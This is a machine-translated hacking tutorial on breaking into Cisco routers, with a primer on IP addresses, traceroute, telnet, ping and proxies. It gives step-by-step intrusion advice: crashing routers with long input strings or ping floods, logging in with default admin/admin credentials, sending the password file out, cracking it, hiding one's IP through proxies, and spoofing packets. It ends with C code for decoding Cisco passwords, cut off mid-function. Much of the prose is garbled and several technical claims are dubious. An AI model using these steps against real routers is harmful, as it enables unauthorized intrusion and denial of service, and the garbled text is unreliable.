Attack Cisco Router Description: Originally from Blacksun, Dream Wake Time Translation. This is a very good article, I am very happy to share with you! ---------------------------------- table of Contents: -------------- -------------------- - What is IP address? - What is ISP? - What is TCP / IP packet? - How to hide your IP address? - How to use Telnet? - How to use Hyperterminal? - How to use ping? - How to use Traceroute? - How to use a proxy server? ------------------------------------- - Part 1: Why attack the Cisco router? - Section 2: How to find a Cisco router? - Article 3: How to break into a Cisco router? - Article 4: How to crack the password? - Article 5: How to use a Cisco router? ---------------------------------------------- - What is IP address? IP is an abbreviation of Internet Protocol, and the computer recognizes other computers in the network through an IP address. This is why you are kicking in IRC and find your ISP and your probably position. The IP address is easy to get, basically available from the following methods: - You visit a website, your IP is recorded - in IRC, someone gets your IP address - in ICQ, OICQ, you can simple Get your IP address and use some gadgets. - If your computer is connected to someone, you can see the SYSTAT to see those computer connections (displayed in IP address) - someone sends you a message written by Java program, you can get your IP address and Many of many ways get IP addresses, including using some Trojans and backdoor programs. ----------- What is ISP? ISP is an abbreviation of Internet Service Provider, which is connected to the Internet. You will connect and connect after you dial.
We can run a TraceRoute to find our ISP (Traceroute will also introduce). You should see like this: Tracert 222.2222.22 Tracing route to [221.223.24.54] Over a maximum of 30 hops. 1 147MS 122MS 132MS Your.ISP [222222.22.21] <<< Your ISP 2 122ms 143ms 123ms Isp.firewall [22222.22.20] << 3 156ms 142ms 122ms Aol.com [207.22.44.33] 4 * * Request Timed Out 5 101ms 102ms 133ms Cisco.Router [194.33.44.33] << 6 233ms 143ms 102ms Something.IP [111.11.11] 7 222ms 123ms 213ms Netcom.com [122.11.21.21] 8 152ms 211ms 212ms Blahblah.TTS.NET [121.21. 21.33] 9 122ms 223ms 243ms altavista.34.com [121.22.32.43] << Target ISP 10 101ms 122ms 132ms 221.223.24.54.altavista.34.com [221.223.24.54] Trace completion. ------- ----------- What is TCP / IP packet? TCP / IP is the abbreviation of Transmission Control Protocol and Internet Protocol, a TCP / IP packet is a compressed packet, which will be sent to another computer. This is the way the network data is transmitted, by sending a packet. The head of the packet includes the IP address of the machine that sends a packet. You can rewrite the packet, and the surface is from other people! ! You can access many systems through this illegal access without discovering. Of course, you need to run or use a software on Linux to complete this work. This tutorial will not introduce you how to do this on a Cisco router, but it is very convenient to attack some systems. If you try to attack some systems, you can't start, you can always try this ... ------------------ How to hide your IP address? With software such as GENIUS 2 or DC IS, you will be able to run identd. You can change your IP address at any time. When you are kicked out in IRC, you can use it again. When you visit other systems, you can also use it, then record is the wrong IP address ... ------------- How to use Telnet? You can use "run" in the Start menu, enter telnet, then determine. You run Telnet, you can change some options Click: Terminal> preferences. You can change the size of the buffer here. You can also turn on / close "Local Echo". If you open "Local Echo", your computer will display anything you entered, and the connected computer will be a response. So you will see like these: You enter "h * llo", what you see is HheleLollo because the return information is mixed with the content you entered. The only reason I do this is to see whether the connected machine is for me, whether it will respond. By default, Telnet will only be connected via a Telnet port, ie the fracture 23.
You will not only connect to port 23, so you can change the port at any time. You can change to 25, which is the port of the mail service. It can also be 21, that is the port of the FTP. There are thousands of ports, so you have to choose the correct port! ---------------------- How to use the super terminal? The hyper terminal allows your computer to listen to a computer. If there is information to this port, you can perform the transmission. Super Terminal In Start> Program> Accessories> Communication, no, you can install it in the control panel. First, you have to choose the connection protocol, we choose "TCP / IP Winsock", then enter the computer you want to connect, select the port below. You can choose Call> Wait for Call to wait for the file. Such other computers can connect to you through a port, you can also chat, or send files. ------------ How to use ping? Ping is very simple, in the MS-DOS mode, enter "ping IP address", the default is ping three times, you can also set it yourself. "Ping IP address -t" can make it non-stop. Changing the size of the ping can do this: "ping -l (size) ip.address" ping actually sending a packet to the remote machine, the remote machine receives the packet to return, we can see this process time. The shorter the time, the faster the speed, of course, when crowded, the packet loss will occur. Ping will slow down the speed of the PING, even when the traffic is too large, even make its DOWN machine. One minute ping attack can make a Win98 computer crash. (Because of its connection buffer overflow - connected over, Windows decided to rest and rest:>). Ping attack will take you a lot of bandwidth, so your bandwidth is larger than the target machine (unless the target machine is running Windows 98, And you have a good cat. In such a minute, you can call it next to the stage). Ping attack has no effect on the strong system. Note: The DOS's -t option is not a ping attack, it is just a small connection, and there are many intervals in the middle. In a Unix or Linux machine, you can use the on-form -F to make a real ping attack. In fact, if your distribution is Osix-Compliant (POSIX -Portable Operating System Interface Based on Unix), it is not a real UNIX / Linux distribution. So if you have an OS, I said that I am unix, and Linux, then there is -f. ------------------ How to use Traceroute? To track your connection (can be observed to the connection route of the target machine), as long as you enter "Tracert IP Address" in the MS-DOS mode. You will see a computer directory, which is the machine between you and the target. You can use this method to determine if there is a firewall or you can determine someone's ISP (Internet Service Provider). To determine the ISP, just look at the previous IP address of the target machine, it should be the router of the ISP. Basically, this is how Traceroute works - a TCP / IP packet, has a value in its head (on the head of IP.
If you don't know what this means, it doesn't matter, you can then look down on it) called TTL, it is an abbreviation for Time to Live. When a packet passes the router, its TTL value is reduced. This may cause the packet to flow in the network and consume bandwidth. So whenever a packet TTL value reaches 0, it will fail and because an ICMP error returns to the sender. Now Tracerout first sends a TTL value of 1 packet, then it will soon return. Check the head of ICMP errors, Traceroute can know where the packet is first. Then, the data packet of the TTL value is 2 is sent, and after returning, it is the second time. Go down until the final destination, you can know the entire path. Do you understand now? ------------------ How to use the proxy server? Looking for an proxy server online, including the proxy server you need to open port. Once you have found, you can connect to another computer with Telnet or Hyperterminal through the proxy server. Don't make sure your IP address is made to do other computers. ----------------------------- First: Why attack the Cisco router? You may think .. Why attack the Cisco router? The answer is that it will be very useful for breaking into other systems ... Cisco router is very fast, in a system, some will be connected to 18 T1. And they are very flexible, although most run Telnet, they can play a role when DOS attacks or attacks other systems. They also have thousands of packets. However, you can be captured ... Many Cisco routers are enacted to the system, which allows you to access the exact quantity of other computers in its network. ------------------------------ Section 2: How to find a Cisco router? Finding a Cisco router can be said to be a simple task, almost all ISPs pass at least a Cisco router. The easiest way is to run tracert under DOS, you can track many computers between computers, there must be a "Cisco" name between the computer. If you find it, write down its IP address. What is the opening 2001 port (Cisco Router Management) and 23 ports are! Now you have the location of the Cisco router, but it may have a firewall to protect it, so you have to check if it is blocked, if there is a response, it may not be blocked. Another method is to try some ports of the Cisco router. You can use telnet, port 23, if it is to enter a password, not a name of the user, you may be in a firewall. Try to find a router that is not protected by the firewall, because this tutorial theme is a router, not teaching you how to pass through the firewall. When you are sure to find a good system, you should find a proxy server that can use 23 ports so your IP address will not be recorded by the router. --------------------------------- Article 3: How to break into a Cisco router? The Cisco router runs V4.1 version of the software (now commonly used), which is easy to dry.
You just connect to a cisco router through a proxy server, enter a long string of code, such as: 10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk 10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk 10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk 10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk now and so, cisco systems will restart, it can be said that you have to attack it, it is offline .. But after 2-10 minutes, it will recover, we should enter it. If nothing happens, then it is not a fragile software, you can try several DOS attacks, such as a lot of ping. Under DOS, enter "ping -l 56550 cisco.router.ip -t", this will Get the same effect. It can make it DOWN machine. Be careful! I believe you should know how to protect yourself. If it is passive, find another proxy server for connection. And the user is named "admin", the password is "admin" because it is default. Because it is temporarily disabled, it will return to the default state. Now, you have already entered, you should get your password file! The system runs different software, but most of the tips like "htl-textil", now enter "?", Watch your life. You will see a lot of commands, you will find a transfer command, with this command, in the case of the current admin user, send your password file to your computer 23 port. But before this, you have to set your super terminal. After you send a file, the hyper terminal will ask if you receive a file, you choose to be in your computer. Offline. You have passed the most difficult part, and you are ready to start cracking your password. -------------------- Article 4: How to crack your password? Now, you get your password file, you have to crack it to continue to enter the router. So you can run the software such as John The Ripper to decipher it. This is the easiest way I recommend. Another way is to tries to decode it. Doing this requires a decoding software, use certain decoding software, you have to have enough patience.
There is a software specifically decoded for the Cisco router password file. You can compile it in Linux: #include #include char xlat [] = {0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f, 0x41, 0x2c , 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72, 0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44}; char pw_str1 [] = "password 7"; char pw_str2 [] = "enable-password 7"; char * PNAME; cDecrypt (eNC_PW, DEC_PW) char * enc_pw; char * DEC_PW; {UNSIGNED INT SEED, I, VAL = 0; IF (Strlen (ENC_PW) & 1) Return (-1); SEED = (ENC_PW [0] - '0') * 10 ENC_PW [1] - '0'; if (SEED> 15 ||! Isdigit (ENC_PW [0]) ||! Isdigit (ENC_PW [1])) Return (-1); for i = 2; I <= Strlen (ENC_PW); i ) {IF (i! = 2 &&! (i & 1)) {dec_pw [I / 2 - 2] = VAL ^ XLAT [SEED ]; VAL = 0; } Val * = 16; if (isdigit (enc_pw = TouPper (ENC_PW))) {VAL = ENC_PW - '0'; Continue;} if (ENC_PW> = 'a' && Enc_PW <= 'f') {VAL = ENC_PW - 'A' 10; Continue;} IF (Strlen (ENC_PW)! = i) Return (-1);} DEC_PW [ I / 2] = 0; return (0);} usage () { FPRINTF (stdout, "usage:% s -p fprintf (stdout,"% s return (0);} main (argc, argv) int Arg CHar ** argv; {file * in = stdin, * out = stdout; char line [257]; char passwd [65]; unsigned INT I, PW_POS; PNAME = argv [0]; if (argc> 1) {If (argc> 3) {usage (); exit (1);} if (argv [1] [0] == '-') {switch (argv [1] [1]) {CASE 'H': USAGE (); Break; Case 'P': IF (CDecrypt (Argv [2], Passwd) {fprintf (stderr, "error./n"); exit (1);} fprintf (stdout, "password:% S / N ", passwd); Break; default: fprintf (stderr,"% s: unknow option. "
